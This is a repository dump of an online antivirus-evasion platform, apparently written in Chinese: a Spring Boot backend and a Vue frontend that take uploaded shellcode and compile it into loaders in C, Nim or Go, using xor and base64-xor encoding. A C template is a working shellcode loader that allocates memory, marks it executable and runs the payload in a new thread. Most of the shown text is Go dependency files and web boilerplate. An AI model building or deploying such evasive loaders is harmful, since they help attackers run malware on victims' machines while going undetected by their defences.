/template/go/go_VirtualAlloc/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/andybalholm/brotli v1.0.5 // indirect 7 | github.com/klauspost/compress v1.17.0 // indirect 8 | github.com/valyala/bytebufferpool v1.0.0 // indirect 9 | github.com/valyala/fasthttp v1.51.0 // indirect 10 | golang.org/x/sys v0.16.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | 
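github.com/andybalholm/brotli v1.0.5 // indirect 7 | github.com/klauspost/compress v1.17.0 // indirect 8 | github.com/valyala/bytebufferpool v1.0.0 // indirect 9 | github.com/valyala/fasthttp v1.51.0 // indirect 10 | golang.org/x/sys v0.16.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/valyala/fasthttp v1.52.0 7 | golang.org/x/sys v0.20.0 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.1.0 // indirect 12 | github.com/klauspost/compress v1.17.6 // indirect 13 | github.com/valyala/bytebufferpool v1.0.0 // indirect 14 | ) 15 | --------------------------------------------------------------------------------
/AVEvasionCraftOnline-Frontend/src/utils/auth.js:
--------------------------------------------------------------------------------
import Cookies from 'js-cookie'

// Name of the cookie that holds the session token on the client.
// Note: a cookie written from page script can never be HttpOnly, so the token
// stays readable by any script running on this origin.
const TokenKey = 'bbs_pro_token'

// Attributes applied every time the token cookie is written.
// `sameSite: 'strict'` stops the browser from attaching the token to requests
// initiated from other sites (CSRF mitigation); the API is called with
// same-origin `/api/...` URLs, so this does not affect normal use.
// TODO(review): add `secure: true` once the app is served over HTTPS — on a
// plain-HTTP dev origin a Secure cookie is silently not stored.
const TokenCookieAttributes = { sameSite: 'strict' }

/** Reads the token cookie; yields whatever js-cookie returns for a missing cookie. */
export function getToken() {
  return Cookies.get(TokenKey)
}

/** Writes `token` into the token cookie with the hardened attributes above. */
export function setToken(token) {
  return Cookies.set(TokenKey, token, TokenCookieAttributes)
}

/** Deletes the token cookie (SameSite is not part of the cookie identity, so no attributes are needed here). */
export function removeToken() {
  return Cookies.remove(TokenKey)
}
--------------------------------------------------------------------------------
/template/go/go_CertEnumSystemStore/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/valyala/fasthttp v1.52.0 7 | golang.org/x/sys v0.20.0 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.1.0 // indirect 12 | github.com/klauspost/compress v1.17.6 // indirect 13 | github.com/valyala/bytebufferpool v1.0.0 // indirect 14 | ) 15 | --------------------------------------------------------------------------------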
/AVEvasionCraftOnline-Frontend/.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | pnpm-debug.log* 8 | lerna-debug.log* 9 | 10 | node_modules 11 | dist 12 | dist-ssr 13 | *.local 14 | 15 | # Editor directories and files 16 | .vscode/* 17 | !.vscode/extensions.json 18 | .idea 19 | .DS_Store 20 | *.suo 21 | *.ntvs* 22 | *.njsproj 23 | *.sln 24 | *.sw? 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 在线免杀平台 8 | 9 | 10 | 11 |
12 | 13 | 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/ShellcodeProcessorTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 4 | import org.junit.jupiter.api.Test; 5 | 6 | import java.io.IOException; 7 | 8 | import static org.junit.jupiter.api.Assertions.*; 9 | 10 | class ShellcodeProcessorTest { 11 | 12 | @Test 13 | void transformation() throws IOException { 14 | 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.eslintrc.cjs: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | env: { 3 | browser: true, 4 | es2021: true 5 | }, 6 | extends: ['eslint:recommended', 'plugin:vue/vue3-essential'], 7 | overrides: [], 8 | parserOptions: { 9 | ecmaVersion: 'latest', 10 | sourceType: 'module' 11 | }, 12 | plugins: ['vue'], 13 | rules: {}, 14 | globals: { 15 | defineProps: 'readonly', 16 | defineEmits: 'readonly', 17 | defineExpose: 'readonly', 18 | withDefaults: 'readonly' 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/vue.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/AvEvasionCraftOnlineApplication.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import 
org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class AvEvasionCraftOnlineApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(AvEvasionCraftOnlineApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/components/HelloWorld.vue: -------------------------------------------------------------------------------- 1 | 9 | 10 | 21 | 22 | 27 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/compile.js: -------------------------------------------------------------------------------- 1 | import request from '../utils/request.js' 2 | 3 | export function fetchConfig() { 4 | return request({ 5 | url: `/api/avevasion/config`, 6 | method: 'get' 7 | }) 8 | } 9 | 10 | export function fetchDownloadLink(endpoint) { 11 | return request({ 12 | url: `/api${endpoint}`, 13 | method: 'get', 14 | responseType: 'blob' 15 | }) 16 | } 17 | 18 | export function fetchCompileUpload(data) { 19 | return request({ 20 | url: `/api/compiler`, 21 | method: 'post', 22 | data, 23 | }) 24 | } 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.gitignore: -------------------------------------------------------------------------------- 1 | HELP.md 2 | target/ 3 | src/main/resources/static/ 4 | !.mvn/wrapper/maven-wrapper.jar 5 | !**/src/main/**/target/ 6 | !**/src/test/**/target/ 7 | 8 | ### STS ### 9 | .apt_generated 10 | .classpath 11 | .factorypath 12 | .project 13 | .settings 14 | .springBeans 15 | .sts4-cache 16 | 17 | ### IntelliJ IDEA ### 18 | .idea 19 | *.iws 20 | *.iml 21 | *.ipr 22 | 23 | ### NetBeans ### 24 | /nbproject/private/ 25 | /nbbuild/ 26 | /dist/ 27 | /nbdist/ 28 | /.nb-gradle/ 29 | build/ 30 | !**/src/main/**/build/ 31 | !**/src/test/**/build/ 32 | 33 
| ### VS Code ### 34 | .vscode/ 35 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/CompilerCodeTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.util.Arrays; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | class CompilerCodeTest { 10 | 11 | @Test 12 | void compileNim() { 13 | } 14 | 15 | @Test 16 | void compileGo() { 17 | } 18 | 19 | @Test 20 | void compileC() { 21 | String code = "C:\\1bypassAVOnline\\template\\nim\\v1\\v1.nim"; 22 | // CompilerCode.compileNim(code); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /template/c/c_VirtualAlloc/none/c_VirtualAlloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char calc_payload[{{Len}}] = { 4 | {{Shellcode}} 5 | }; 6 | 7 | unsigned int payload_len = sizeof(calc_payload); 8 | 9 | int main(void) { 10 | 11 | PVOID calcSt; 12 | HANDLE calcTH; 13 | DWORD oldProtectCalc = 0; 14 | calcSt = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | RtlMoveMemory(calcSt, calc_payload, payload_len); 16 | VirtualProtect(calcSt, payload_len, PAGE_EXECUTE_READ, &oldProtectCalc); 17 | calcTH = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) calcSt, 0, 0, 0); 18 | WaitForSingleObject(calcTH, -1); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/README.md: -------------------------------------------------------------------------------- 1 | # BypassAVOnline-Front 2 | 3 | 4 | #### 技术栈 5 | 6 | - Vite3 7 | - Vue3 8 | - Vuex 9 | - Vue Router 10 | - Axios 11 | - element-plus 12 | - vueuse 13 | - js-cookie 14 | - normalize.css 
15 | - eslint + prettier 16 | 17 | …… 18 | 19 | 20 | #### 常用指令 21 | 22 | - 安装 23 | 24 | ``` 25 | yarn install 26 | ``` 27 | 28 | - 启动 29 | 30 | ``` 31 | yarn dev 32 | ``` 33 | 34 | - 编译 35 | 36 | ``` 37 | yarn build 38 | ``` 39 | 40 | - 检查和修复文件 41 | 42 | ``` 43 | yarn lint 44 | ``` 45 | 46 | - 格式化代码 47 | 48 | ``` 49 | yarn format 50 | ``` 51 | 52 | #### 更多自定义配置 53 | 54 | See [Configuration Reference](https://cli.vuejs.org/config/). 55 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/user.js: -------------------------------------------------------------------------------- 1 | import request from '../utils/request.js' 2 | 3 | export function getCode() { 4 | return request({ 5 | url: '/captcha', 6 | method: 'get' 7 | }) 8 | } 9 | 10 | export function login(data) { 11 | return request({ 12 | url: '/vue-admin-template/user/login', 13 | method: 'post', 14 | data 15 | }) 16 | } 17 | 18 | export function getInfo(token) { 19 | return request({ 20 | url: '/vue-admin-template/user/info', 21 | method: 'get', 22 | params: { token } 23 | }) 24 | } 25 | 26 | export function logout() { 27 | return request({ 28 | url: '/vue-admin-template/user/logout', 29 | method: 'post' 30 | }) 31 | } 32 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/service/CompileService.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.service; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.CompilationResponseDTO; 4 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 5 | 6 | import java.io.IOException; 7 | 8 | public interface CompileService { 9 | 10 | CompilationResponseDTO compileCodeC(ShellcodeUploadDTO shellcodeUploadDTO) throws IOException; 11 | CompilationResponseDTO compileCodeNim(ShellcodeUploadDTO 
shellcodeUploadDTO) throws IOException; 12 | CompilationResponseDTO compileCodeGo(ShellcodeUploadDTO shellcodeUploadDTO) throws IOException; 13 | } 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/controller/BypassAVConfigController.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.controller; 2 | 3 | import com.yutian4060.avevasioncraftonline.config.BypassAVConfigProperties; 4 | import org.springframework.beans.factory.annotation.Autowired; 5 | import org.springframework.web.bind.annotation.*; 6 | 7 | @RestController 8 | @RequestMapping("/api") 9 | public class BypassAVConfigController { 10 | 11 | @Autowired 12 | private BypassAVConfigProperties configProperties; 13 | 14 | @GetMapping("/avevasion/config") 15 | public BypassAVConfigProperties getConfig() { 16 | return configProperties; 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/main.js: -------------------------------------------------------------------------------- 1 | import './style.css' 2 | 3 | import router from './router' 4 | import store from './store' 5 | 6 | import { createApp } from 'vue' 7 | import ElementPlus from 'element-plus' 8 | import 'element-plus/dist/index.css' 9 | import App from './App.vue' 10 | 11 | import 'element-plus/theme-chalk/dark/css-vars.css' // ep-dark-css 12 | import './style-dark.css' // dark-style 13 | import 'normalize.css' 14 | import * as ElementPlusIconsVue from '@element-plus/icons-vue' 15 | 16 | 17 | const app = createApp(App) 18 | for (const [key, component] of Object.entries(ElementPlusIconsVue)) { 19 | app.component(key, component) 20 | } 21 | app.use(router).use(store).use(ElementPlus).mount('#app') 
-------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- 
/template/go/go_SetTimer/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod 